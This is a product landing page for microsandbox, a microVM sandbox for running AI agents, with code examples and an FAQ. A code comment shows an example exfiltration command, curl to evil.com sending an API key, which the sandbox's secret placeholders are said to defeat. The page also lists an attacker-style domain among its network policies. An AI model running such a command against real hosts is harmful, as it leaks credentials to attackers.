Backed by  Combinator · F26

Every agent deservesa computer.

Run agents in secure, local-first sandboxes. On your laptop, in your VPC, on-prem, or in our cloud. Programmable, fast, and yours.

npx microsandbox run ubuntu:latest
Copied to clipboard
Run locally todayJoin the cloud beta

What's inside

Engineered down to the kernel.

The runtime, the security model, and the developer ergonomics, all in one library you embed and forget.

Speed

2.5× faster than Firecracker.

libkrun microVMs, pre-patched kernel as a shared library, zero-copy mmap. Boots faster than Docker on bare-metal Linux, with full hardware isolation.

vs firecracker2.5×
microsandbox
320ms
docker
463ms
firecracker
808ms

Bare-metal Linux/KVM, alpine userspace, 10-iteration median. Methodology

Security

Secrets that can't leak

Real keys never enter the guest. microsandbox swaps in placeholders and substitutes the value on a verified TLS handshake to an allowlisted host.

OPENAI_API_KEYsk-proj-•••••••••
STRIPE_SECRET_KEYsk_live_••••••••
AWS_SECRET_ACCESS_KEYaws-••••••••
real keys never enter the guest
Footprint

No daemon, no root

Embeds as a library in your process. No socket, no PID 1, no privileged install. If your code's running, the runtime is running.

microsandbox
your-app
└ libmsb (embedded)
└ microVMs · per-call
docker
your-app
└ /var/run/docker.sock
└ dockerd (root daemon)
Portability

Cross-platform native

One SDK, one Sandboxfile, one CLI, on every OS that matters.

macOSHVF
WindowsWSL2
LinuxKVM
same SDK · same Sandboxfile · same CLI
On-prem

Run inside your perimeter

Self-host on a laptop, in your VPC, in regulated data centers, even fully air-gapped. No telemetry, no phone-home, your data never leaves.

Your laptop
macOS · Linux · WSL
CI / build farm
any runner
Your VPC
AWS · GCP · Azure
Air-gapped on-prem
regulated data centers
no telemetry · no phone-home · your data, your perimeter
Compatibility

Any OCI image

Pull from Docker Hub, GHCR, ECR, GCR, Quay, or your private registry. Your existing images just work.

Docker Hubdocker.io
GitHubghcr.io
AWSecr.aws
Googlegcr.io
Quayquay.io
Privateyour-registry.dev
Network

Programmable network policy

Allowlist hosts, pin DNS resolutions to defeat rebinding, inspect TLS at the edge. The sandbox can't talk to anything you didn't approve.

api.openai.com
TLS-pinned
registry.npmjs.org
TLS-pinned
169.254.169.254
metadata IMDS
*.evil.dev
rebinding guard
DNS pinned per resolution · TLS verified per request
Cloud syncComing soon

Sync across machines

Spin up locally. Inspect from your laptop. Run the same sandbox on prod. State streams between every machine you trust.

laptoplocal
cloudmsb sync
serverprod
sync state across every machine

What's inside, in detail

Every layer is yours to control.

Programmable controls

Control what your agents can touch.

Allowlist hosts, block by default, inject secrets only on verified TLS to approved domains.

const sb = await Sandbox.create("agent", {
image: "python:3.12",
secrets: { "OPENAI_API_KEY": [key, "api.openai.com"] }
});

// Inside the sandbox:
// echo $OPENAI_API_KEY → $MSB_OPENAI_API_KEY
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
Snapshots

Snapshot, fork, restore.

Save full VM state and fork hundreds of identical sandboxes from one baseline. Sub-millisecond restore, no re-boot.

const sb = await Sandbox.create("base", { image: "python:3.12" });
await sb.exec("pip install numpy pandas torch");

const snap = await sb.snapshot("ml-ready");

// Fork 100 workers from the same baseline
const workers = await Promise.all(
Array.from({ length: 100 }, (_, i) =>
snap.restore(`w-${i}`, { env: { WORKER_ID: String(i) } })
)
);
Filesystems

Extensible filesystem backends.

Mount custom filesystem implementations. Intercept reads and writes, build virtual filesystems, proxy to remote storage.

class AuditFs extends FileSystemBackend {
open(ctx, ino, flags) {
log(`open ino=${ino} pid=${ctx.pid}`);
return this.inner.open(ctx, ino, flags);
}
// read, write, lookup, mkdir, unlink ...
}

const sb = await Sandbox.create("app", {
image: "python:3.12",
volumes: {
"/data": new AuditFs("./data"),
"/cache": new MemFs(),
}
});
Multi-agent

Spawn sandboxes from sandboxes.

Code running inside a sandbox can spawn peer sandboxes alongside itself. Each gets its own network, filesystem, and secrets.

// Running inside a microsandbox
const rt = await Sandbox.currentRuntime();

// Spawn peer sandboxes (isolated, same level)
const researcher = await rt.start("researcher", {
image: "python:3.12",
secrets: { "SERP_KEY": [key, "serpapi.com"] },
});

const coder = await rt.start("coder", {
image: "node:20",
network: { denyAll: true }, // air-gapped
});
Projects

Declare a fleet. Bring it up with one command.

A Sandboxfile defines the topology, multiple agents, scoped capabilities, network policies.

name: my-project

volumes:
data: { size: 10G }

sandboxes:
api:
image: python:3.11
volumes: [./src:/app, data:/data]
ports: [8000:8000]
secrets: [OPENAI_API_KEY]
network:
allow: [api.openai.com]
dns: { rebind_protection: strict }
scripts:
start: python app.py
test: pytest

worker:
from_snapshot: ml-ready
memory: 2G
depends_on: [api]
Plugins

Composable plugin system.

Stack an audit logger, a rate limiter, and a custom network monitor on the same sandbox. Compose in-process or out-of-process plugins.

const sb = await Sandbox.create("app", {
image: "python:3.12",
plugins: [
new AuditLog("/var/log/audit"),
new RateLimiter({ maxExecPerSec: 100 }),
],
pluginProcesses: ["node ./plugins/monitor.js"],
});

// AuditLog plugin · ~10 lines
class AuditLog implements Plugin {
constructor(private path: string) {}

async onExec(c: ExecContext) {
const line = JSON.stringify({
t: Date.now(),
cmd: c.cmd,
caller: c.callerId,
}) + "\n";
await fs.appendFile(this.path, line);
}
}
Cloud sync
Coming soon

Local sandboxes, resume anywhere.

Sync sandbox filesystems to the cloud. Pick up exactly where you left off from any machine. Same files, same environment.

See how sync works
const sb = await Sandbox.create("ml-project", {
image: "python:3.12",
});
await sb.exec("pip install torch");

// Push filesystem state to the cloud
await sb.push();

// On another machine: pull and resume
const pulled = await Sandbox.pull("ml-project");
await pulled.start();
FAQ

Frequently asked.

Still have a question? Ask in Discord.

How is this different from Docker?

Docker shares one kernel across containers. microsandbox gives every sandbox its own kernel inside a microVM, so a compromise can't reach the host. Real hardware isolation, not namespace isolation.

Is my code and data private?

Yes. Local and on-prem sandboxes never leave your infrastructure. The cloud beta keeps state encrypted with keys you hold, so we never see decrypted contents.

Can I run microsandbox on-prem or air-gapped?

Yes. The runtime is a library you embed and ship anywhere you can run a Linux or macOS host: your laptop, a CI runner, a VM in your VPC, regulated data centers, or fully air-gapped servers. Nothing phones home, no telemetry. Your data never leaves your perimeter.

Which languages do you support?

Rust, TypeScript/Node, Python, and a CLI today. Go and Terraform are next.

Is microsandbox open source?

The local runtime is. Apache 2.0, fully on GitHub. The cloud platform will have its own commercial license, with details when the beta opens.

How does pricing work?

Running locally or on your own infrastructure is free, forever. Cloud pricing arrives with the closed beta. Drop your email and we'll bring you in as we open up.

Closed beta

Cloud and on-prem, almost here.

Drop your email and we'll invite you in as the beta opens up.

Want to talk first? Schedule a call